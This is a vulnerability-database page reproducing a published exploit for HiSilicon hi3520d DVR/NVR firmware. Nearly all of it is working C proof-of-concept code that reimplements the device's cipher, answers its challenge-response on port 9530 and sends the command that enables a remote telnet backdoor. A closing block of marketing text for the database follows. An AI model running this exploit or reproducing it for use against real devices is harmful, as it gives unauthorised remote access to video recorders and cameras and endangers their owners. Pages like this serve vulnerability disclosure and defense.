Vulners
Lucene search
HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account
# Exploit Title: HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account
# Dork: N/A
# Date: 2020-02-03
# Exploit Author: Snawoot
# Vendor Homepage: http://www.hisilicon.com
# Product Link: http://www.hisilicon.com/en/Products
# Version: hi3520d
# Tested on: Linux
# CVE: N/A
# References: https://habr.com/en/post/486856/
# References: https://github.com/Snawoot/hisilicon-dvr-telnet
# References: https://github.com/tothi/pwn-hisilicon-dvr#summary
# POC:
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
typedef unsigned char byte;
typedef unsigned int uint;
byte state[2048] = {0};
byte datum[] = {
0x20, 0x01, 0x02, 0x03, 0x04, 0x05, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09,
0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11,
0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19,
0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x01,
0x0e, 0x04, 0x0d, 0x01, 0x02, 0x0f, 0x0b, 0x08, 0x03, 0x0a, 0x06, 0x0c,
0x05, 0x09, 0x00, 0x07, 0x00, 0x0f, 0x07, 0x04, 0x0e, 0x02, 0x0d, 0x01,
0x0a, 0x06, 0x0c, 0x0b, 0x09, 0x05, 0x03, 0x08, 0x04, 0x01, 0x0e, 0x08,
0x0d, 0x06, 0x02, 0x0b, 0x0f, 0x0c, 0x09, 0x07, 0x03, 0x0a, 0x05, 0x00,
0x0f, 0x0c, 0x08, 0x02, 0x04, 0x09, 0x01, 0x07, 0x05, 0x0b, 0x03, 0x0e,
0x0a, 0x00, 0x06, 0x0d, 0x0f, 0x01, 0x08, 0x0e, 0x06, 0x0b, 0x03, 0x04,
0x09, 0x07, 0x02, 0x0d, 0x0c, 0x00, 0x05, 0x0a, 0x03, 0x0d, 0x04, 0x07,
0x0f, 0x02, 0x08, 0x0e, 0x0c, 0x00, 0x01, 0x0a, 0x06, 0x09, 0x0b, 0x05,
0x00, 0x0e, 0x07, 0x0b, 0x0a, 0x04, 0x0d, 0x01, 0x05, 0x08, 0x0c, 0x06,
0x09, 0x03, 0x02, 0x0f, 0x0d, 0x08, 0x0a, 0x01, 0x03, 0x0f, 0x04, 0x02,
0x0b, 0x06, 0x07, 0x0c, 0x00, 0x05, 0x0e, 0x09, 0x0a, 0x00, 0x09, 0x0e,
0x06, 0x03, 0x0f, 0x05, 0x01, 0x0d, 0x0c, 0x07, 0x0b, 0x04, 0x02, 0x08,
0x0d, 0x07, 0x00, 0x09, 0x03, 0x04, 0x06, 0x0a, 0x02, 0x08, 0x05, 0x0e,
0x0c, 0x0b, 0x0f, 0x01, 0x0d, 0x06, 0x04, 0x09, 0x08, 0x0f, 0x03, 0x00,
0x0b, 0x01, 0x02, 0x0c, 0x05, 0x0a, 0x0e, 0x07, 0x01, 0x0a, 0x0d, 0x00,
0x06, 0x09, 0x08, 0x07, 0x04, 0x0f, 0x0e, 0x03, 0x0b, 0x05, 0x02, 0x0c,
0x07, 0x0d, 0x0e, 0x03, 0x00, 0x06, 0x09, 0x0a, 0x01, 0x02, 0x08, 0x05,
0x0b, 0x0c, 0x04, 0x0f, 0x0d, 0x08, 0x0b, 0x05, 0x06, 0x0f, 0x00, 0x03,
0x04, 0x07, 0x02, 0x0c, 0x01, 0x0a, 0x0e, 0x09, 0x0a, 0x06, 0x09, 0x00,
0x0c, 0x0b, 0x07, 0x0d, 0x0f, 0x01, 0x03, 0x0e, 0x05, 0x02, 0x08, 0x04,
0x03, 0x0f, 0x00, 0x06, 0x0a, 0x01, 0x0d, 0x08, 0x09, 0x04, 0x05, 0x0b,
0x0c, 0x07, 0x02, 0x0e, 0x02, 0x0c, 0x04, 0x01, 0x07, 0x0a, 0x0b, 0x06,
0x08, 0x05, 0x03, 0x0f, 0x0d, 0x00, 0x0e, 0x09, 0x0e, 0x0b, 0x02, 0x0c,
0x04, 0x07, 0x0d, 0x01, 0x05, 0x00, 0x0f, 0x0a, 0x03, 0x09, 0x08, 0x06,
0x04, 0x02, 0x01, 0x0b, 0x0a, 0x0d, 0x07, 0x08, 0x0f, 0x09, 0x0c, 0x05,
0x06, 0x03, 0x00, 0x0e, 0x0b, 0x08, 0x0c, 0x07, 0x01, 0x0e, 0x02, 0x0d,
0x06, 0x0f, 0x00, 0x09, 0x0a, 0x04, 0x05, 0x03, 0x0c, 0x01, 0x0a, 0x0f,
0x09, 0x02, 0x06, 0x08, 0x00, 0x0d, 0x03, 0x04, 0x0e, 0x07, 0x05, 0x0b,
0x0a, 0x0f, 0x04, 0x02, 0x07, 0x0c, 0x09, 0x05, 0x06, 0x01, 0x0d, 0x0e,
0x00, 0x0b, 0x03, 0x08, 0x09, 0x0e, 0x0f, 0x05, 0x02, 0x08, 0x0c, 0x03,
0x07, 0x00, 0x04, 0x0a, 0x01, 0x0d, 0x0b, 0x06, 0x04, 0x03, 0x02, 0x0c,
0x09, 0x05, 0x0f, 0x0a, 0x0b, 0x0e, 0x01, 0x07, 0x06, 0x00, 0x08, 0x0d,
0x04, 0x0b, 0x02, 0x0e, 0x0f, 0x00, 0x08, 0x0d, 0x03, 0x0c, 0x09, 0x07,
0x05, 0x0a, 0x06, 0x01, 0x0d, 0x00, 0x0b, 0x07, 0x04, 0x09, 0x01, 0x0a,
0x0e, 0x03, 0x05, 0x0c, 0x02, 0x0f, 0x08, 0x06, 0x01, 0x04, 0x0b, 0x0d,
0x0c, 0x03, 0x07, 0x0e, 0x0a, 0x0f, 0x06, 0x08, 0x00, 0x05, 0x09, 0x02,
0x06, 0x0b, 0x0d, 0x08, 0x01, 0x04, 0x0a, 0x07, 0x09, 0x05, 0x00, 0x0f,
0x0e, 0x02, 0x03, 0x0c, 0x0d, 0x02, 0x08, 0x04, 0x06, 0x0f, 0x0b, 0x01,
0x0a, 0x09, 0x03, 0x0e, 0x05, 0x00, 0x0c, 0x07, 0x01, 0x0f, 0x0d, 0x08,
0x0a, 0x03, 0x07, 0x04, 0x0c, 0x05, 0x06, 0x0b, 0x00, 0x0e, 0x09, 0x02,
0x07, 0x0b, 0x04, 0x01, 0x09, 0x0c, 0x0e, 0x02, 0x00, 0x06, 0x0a, 0x0d,
0x0f, 0x03, 0x05, 0x08, 0x02, 0x01, 0x0e, 0x07, 0x04, 0x0a, 0x08, 0x0d,
0x0f, 0x0c, 0x09, 0x00, 0x03, 0x05, 0x06, 0x0b, 0x10, 0x07, 0x14, 0x15,
0x1d, 0x0c, 0x1c, 0x11, 0x01, 0x0f, 0x17, 0x1a, 0x05, 0x12, 0x1f, 0x0a,
0x02, 0x08, 0x18, 0x0e, 0x20, 0x1b, 0x03, 0x09, 0x13, 0x0d, 0x1e, 0x06,
0x16, 0x0b, 0x04, 0x19, 0x3a, 0x32, 0x2a, 0x22, 0x1a, 0x12, 0x0a, 0x02,
0x3c, 0x34, 0x2c, 0x24, 0x1c, 0x14, 0x0c, 0x04, 0x3e, 0x36, 0x2e, 0x26,
0x1e, 0x16, 0x0e, 0x06, 0x40, 0x38, 0x30, 0x28, 0x20, 0x18, 0x10, 0x08,
0x39, 0x31, 0x29, 0x21, 0x19, 0x11, 0x09, 0x01, 0x3b, 0x33, 0x2b, 0x23,
0x1b, 0x13, 0x0b, 0x03, 0x3d, 0x35, 0x2d, 0x25, 0x1d, 0x15, 0x0d, 0x05,
0x3f, 0x37, 0x2f, 0x27, 0x1f, 0x17, 0x0f, 0x07, 0xf4, 0x63, 0x01, 0x00,
0x28, 0x08, 0x30, 0x10, 0x38, 0x18, 0x40, 0x20, 0x27, 0x07, 0x2f, 0x0f,
0x37, 0x17, 0x3f, 0x1f, 0x26, 0x06, 0x2e, 0x0e, 0x36, 0x16, 0x3e, 0x1e,
0x25, 0x05, 0x2d, 0x0d, 0x35, 0x15, 0x3d, 0x1d, 0x24, 0x04, 0x2c, 0x0c,
0x34, 0x14, 0x3c, 0x1c, 0x23, 0x03, 0x2b, 0x0b, 0x33, 0x13, 0x3b, 0x1b,
0x22, 0x02, 0x2a, 0x0a, 0x32, 0x12, 0x3a, 0x1a, 0x21, 0x01, 0x29, 0x09,
0x31, 0x11, 0x39, 0x19, 0x39, 0x31, 0x29, 0x21, 0x19, 0x11, 0x09, 0x01,
0x3a, 0x32, 0x2a, 0x22, 0x1a, 0x12, 0x0a, 0x02, 0x3b, 0x33, 0x2b, 0x23,
0x1b, 0x13, 0x0b, 0x03, 0x3c, 0x34, 0x2c, 0x24, 0x3f, 0x37, 0x2f, 0x27,
0x1f, 0x17, 0x0f, 0x07, 0x3e, 0x36, 0x2e, 0x26, 0x1e, 0x16, 0x0e, 0x06,
0x3d, 0x35, 0x2d, 0x25, 0x1d, 0x15, 0x0d, 0x05, 0x1c, 0x14, 0x0c, 0x04,
0x50, 0x64, 0x01, 0x00, 0x01, 0x01, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02,
0x01, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x01, 0x0e, 0x11, 0x0b, 0x18,
0x01, 0x05, 0x03, 0x1c, 0x0f, 0x06, 0x15, 0x0a, 0x17, 0x13, 0x0c, 0x04,
0x1a, 0x08, 0x10, 0x07, 0x1b, 0x14, 0x0d, 0x02, 0x29, 0x34, 0x1f, 0x25,
0x2f, 0x37, 0x1e, 0x28, 0x33, 0x2d, 0x21, 0x30, 0x2c, 0x31, 0x27, 0x38,
0x22, 0x35, 0x2e, 0x2a, 0x32, 0x24, 0x1d, 0x20
};
void init_cipher_offset_vector(byte *dst,byte *src,int size)
{
int i;
i = 0;
while (i < size) {
dst[i] = (byte)((int)(uint)src[i >> 3] >> (i & 7U)) & 1;
i = i + 1;
}
return;
}
void apply_cipher_offset_vector(byte *dst,byte *src,byte *offset_vector,size_t size)
{
int i;
i = 0;
while (i < (int)size) {
state[i] = src[(uint)offset_vector[i] - 1];
i = i + 1;
}
memcpy(dst,state,size);
return;
}
void cipher_memcpy_shuffle(void *dst,size_t size)
{
memcpy(state,dst,size);
memcpy(dst,(void *)(dst + size),0x1c - size);
memcpy((void *)(dst + (0x1c - size)),state,size);
return;
}
void init_cipher_state(void *dst,void *src)
{
byte current_byte;
int i;
init_cipher_offset_vector(state + 0x190,(byte *)src,0x40);
apply_cipher_offset_vector(state + 0x190,state + 0x190,datum + 0x2d4,0x38);
i = 0;
do {
current_byte = (datum + 0x310)[i];
i = i + 1;
cipher_memcpy_shuffle(state + 0x190,(uint)current_byte);
cipher_memcpy_shuffle(state + 0x190 + 0x1c,(uint)current_byte);
apply_cipher_offset_vector((byte *)dst,state + 0x190,datum + 0x320,0x30);
dst = (byte *)dst + 0x30;
} while (i != 0x10);
return;
}
void cipher_xor(byte *data,byte *key,int size)
{
int i;
i = 0;
while (i < size) {
data[i] = key[i] ^ data[i];
i = i + 1;
}
return;
}
void prepare_key(void *key,size_t key_size)
{
size_t __n;
memset(state + 0x1d0,0,0x10);
__n = key_size;
if (0xf < (int)key_size) {
__n = 0x10;
}
memcpy(state + 0x1d0,key,__n);
init_cipher_state(state + 0x1e0,state + 0x1d0);
if (8 < (int)key_size) {
init_cipher_state(state + 0x4e0,state + 0x1d8);
}
*(state + 0x7e0) = 8 < (int)key_size; // !!!! recheck size
return;
}
void cipher_shuffle(byte *dst,byte *src)
{
byte *caretPtr;
int iVar1;
byte *ptr;
int i;
apply_cipher_offset_vector(state + 0x100,dst,datum,0x30);
cipher_xor(state + 0x100,src,0x30);
ptr = state + 0x100;
i = 0;
do {
iVar1 = i + (uint)ptr[5] + (uint)*ptr * 2;
caretPtr = dst + i;
i = i + 4;
init_cipher_offset_vector
(caretPtr,datum + 0x30 +
(uint)ptr[2] * 4 + (uint)ptr[1] * 8 + (uint)ptr[4] + (uint)ptr[3] * 2 +
iVar1 * 0x10,4);
ptr = ptr + 6;
} while (i != 0x20);
apply_cipher_offset_vector(dst,dst,datum + 0x230,0x20);
return;
}
void cipher_box(byte *result,byte *data,byte *offset_vector,int direction)
{
uint i;
byte *backward_ov_ptr;
byte *forward_ov_ptr;
int iVar3;
init_cipher_offset_vector(state + 0x130,data,0x40);
apply_cipher_offset_vector(state + 0x130,state + 0x130,datum + 0x250,0x40);
if (direction == 0) {
forward_ov_ptr = offset_vector + 0x300;
do {
memcpy(state + 0x170,state + 0x150,0x20);
cipher_shuffle(state + 0x150,offset_vector);
cipher_xor(state + 0x150,state + 0x130,0x20);
memcpy(state + 0x130, state + 0x170, 0x20);
offset_vector = offset_vector + 0x30;
} while (offset_vector != forward_ov_ptr);
}
else {
backward_ov_ptr = offset_vector + 0x2d0;
do {
memcpy(state + 0x170,state + 0x130,0x20);
cipher_shuffle(state + 0x130,backward_ov_ptr);
cipher_xor(state + 0x130,state + 0x150,0x20);
backward_ov_ptr -= 0x30;
memcpy(state + 0x150,state + 0x170,0x20);
} while (backward_ov_ptr != offset_vector + -0x30);
}
apply_cipher_offset_vector(state + 0x130,state + 0x130,datum + 0x294,0x40);
memset(result,0,8);
i = 0;
do {
result[i >> 3] = result[i >> 3] | *(char *)(state + 0x130 + i) << (i & 7);
i = i + 1;
} while (i != 0x40);
return;
}
int decrypt(char *result,char *data,uint data_len,char *key,uint key_len)
{
uint short_key_iter;
int curBlockNumber;
int blockCount;
if (((result != (char *)0x0 && data != (char *)0x0) && (curBlockNumber = 0, key != (char *)0x0))
&& ((data_len + 7 & 0xfffffff8) != 0)) {
prepare_key(key,key_len);
blockCount = (int)(data_len + 7) >> 3;
short_key_iter = *(state + 0x7e0);
if (*(state + 0x7e0) == 0) {
while ((int)short_key_iter < blockCount) {
cipher_box((byte *)result,(byte *)data,state + 0x1e0,1);
short_key_iter = short_key_iter + 1;
result = (char *)((byte *)result + 8);
data = (char *)((byte *)data + 8);
}
}
else {
while (curBlockNumber < blockCount) {
cipher_box((byte *)result,(byte *)data,state + 0x1e0,1);
cipher_box((byte *)result,(byte *)result,state + 0x4e0,0);
cipher_box((byte *)result,(byte *)result,state + 0x1e0,1);
curBlockNumber = curBlockNumber + 1;
result = (char *)((byte *)result + 8);
data = (char *)((byte *)data + 8);
}
}
return 0;
}
return -1;
}
int encrypt(char *result,char *data,uint data_len,char *key,uint key_size)
{
uint uVar2;
int currentBlockNumber;
int blocksCount;
if (((result != (char *)0x0 && data != (char *)0x0) &&
(currentBlockNumber = 0, key != (char *)0x0)) && ((data_len + 7 & 0xfffffff8) != 0)) {
prepare_key(key,key_size);
blocksCount = (int)(data_len + 7) >> 3;
uVar2 = *(state + 0x7e0);
if (*(state + 0x7e0) == 0) {
while ((int)uVar2 < blocksCount) {
cipher_box((byte *)result,(byte *)data,state + 0x1e0,0);
uVar2 = uVar2 + 1;
result = (char *)((byte *)result + 8);
data = (char *)((byte *)data + 8);
}
}
else {
while (currentBlockNumber < blocksCount) {
cipher_box((byte *)result,(byte *)data,state + 0x1e0,0);
cipher_box((byte *)result,(byte *)result,state + 0x4e0,1);
cipher_box((byte *)result,(byte *)result,state + 0x1e0,0);
currentBlockNumber = currentBlockNumber + 1;
result = (char *)((byte *)result + 8);
data = (char *)((byte *)data + 8);
}
}
return 0;
}
return -1;
}
void tohex(unsigned char * in, size_t insz, char * out, size_t outsz)
{
unsigned char * pin = in;
const char * hex = "0123456789ABCDEF";
char * pout = out;
for(; pin < in+insz; pout +=3, pin++){
pout[0] = hex[(*pin>>4) & 0xF];
pout[1] = hex[ *pin & 0xF];
pout[2] = ':';
if (pout + 3 - out > outsz){
/* Better to truncate output string than overflow buffer */
/* it would be still better to either return a status */
/* or ensure the target buffer is large enough and it never happen */
break;
}
}
pout[-1] = 0;
}
char netbuf[4096];
#define PADDED(X) (((X + 7) / 8) * 8)
#define PORT 9530
#define BUFSIZE sizeof(netbuf)
#define CMD_FIRST "OpenTelnet:OpenOnce"
#define CHALLENGE_PROLOGUE "randNum:"
#define VERIFY_OK "verify:OK"
#define CMD_FINAL "CMD:"
#define FINAL_PAYLOAD "Telnet:OpenOnce"
#define OPEN_OK "Open:OK"
ssize_t send_str(int sockfd, char *str, size_t len) {
if (len > 0xFE) {
return -1;
}
char buf[len+1];
buf[0] = len + 1;
memcpy(buf + 1, str, len);
return send(sockfd, buf, len + 1, 0);
}
int main(int argc, char* argv[]) {
int sockfd, numbytes;
struct hostent *he;
struct sockaddr_in their_addr;
if (argc != 3) {
fprintf(stderr, "Usage: %s <host> <PSK>\n", argv[0]);
return 2;
}
if ((he=gethostbyname(argv[1])) == NULL) { /* get the host info */
herror("gethostbyname");
return 1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
return 1;
}
their_addr.sin_family = AF_INET; /* host byte order */
their_addr.sin_port = htons(PORT); /* short, network byte order */
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(their_addr.sin_zero), 8); /* zero the rest of the struct */
if (connect(sockfd, (struct sockaddr *)&their_addr, \
sizeof(struct sockaddr)) == -1) {
perror("connect");
return 1;
}
if (send_str(sockfd, CMD_FIRST, sizeof(CMD_FIRST)) == -1) {
perror("send");
return 1;
}
printf("Sent %s command.\n", CMD_FIRST);
bzero(netbuf, BUFSIZE);
if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
perror("recv");
return 1;
}
puts(netbuf);
if (memcmp(netbuf, CHALLENGE_PROLOGUE, sizeof(CHALLENGE_PROLOGUE) - 1) != 0) {
fprintf(stderr, "No challenge received.\n");
return 3;
}
char *seed = netbuf + sizeof(CHALLENGE_PROLOGUE) - 1;
char challengeStr[strlen(seed) + strlen(argv[2]) + 1];
size_t challengeLen = sprintf(challengeStr, "%s%s", seed, argv[2]);
printf("challenge=%s\n", challengeStr);
char encryptedRandomSeed[PADDED(challengeLen)];
encrypt(encryptedRandomSeed, seed, strlen(seed), challengeStr, challengeLen);
memcpy(netbuf, CHALLENGE_PROLOGUE, sizeof(CHALLENGE_PROLOGUE) - 1);
memcpy(netbuf + sizeof(CHALLENGE_PROLOGUE) - 1, encryptedRandomSeed, PADDED(challengeLen));
if (send_str(sockfd, netbuf, sizeof(CHALLENGE_PROLOGUE) - 1 + PADDED(challengeLen)) == -1) {
perror("send");
return 1;
}
bzero(netbuf, BUFSIZE);
if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
perror("recv");
return 1;
}
puts(netbuf);
if (memcmp(netbuf, VERIFY_OK, sizeof(VERIFY_OK) - 1) != 0) {
fprintf(stderr, "Verification failed.\n");
return 4;
}
char encryptedFinal[PADDED(sizeof(FINAL_PAYLOAD))];
encrypt(encryptedFinal, FINAL_PAYLOAD, sizeof(FINAL_PAYLOAD), challengeStr, challengeLen);
memcpy(netbuf, CMD_FINAL, sizeof(CMD_FINAL) - 1);
memcpy(netbuf + sizeof(CMD_FINAL) - 1, encryptedFinal, sizeof(encryptedFinal));
if (send_str(sockfd, netbuf, sizeof(CMD_FINAL) - 1 + sizeof(encryptedFinal)) == -1) {
perror("send");
return 1;
}
bzero(netbuf, BUFSIZE);
if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
perror("recv");
return 1;
}
puts(netbuf);
if (memcmp(netbuf, OPEN_OK, sizeof(OPEN_OK) - 1)) {
fprintf(stderr, "Open failed.\n");
return 5;
}
return 0;
}
#Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Feb 2020 00:00Current
7High risk
Vulners AI Score7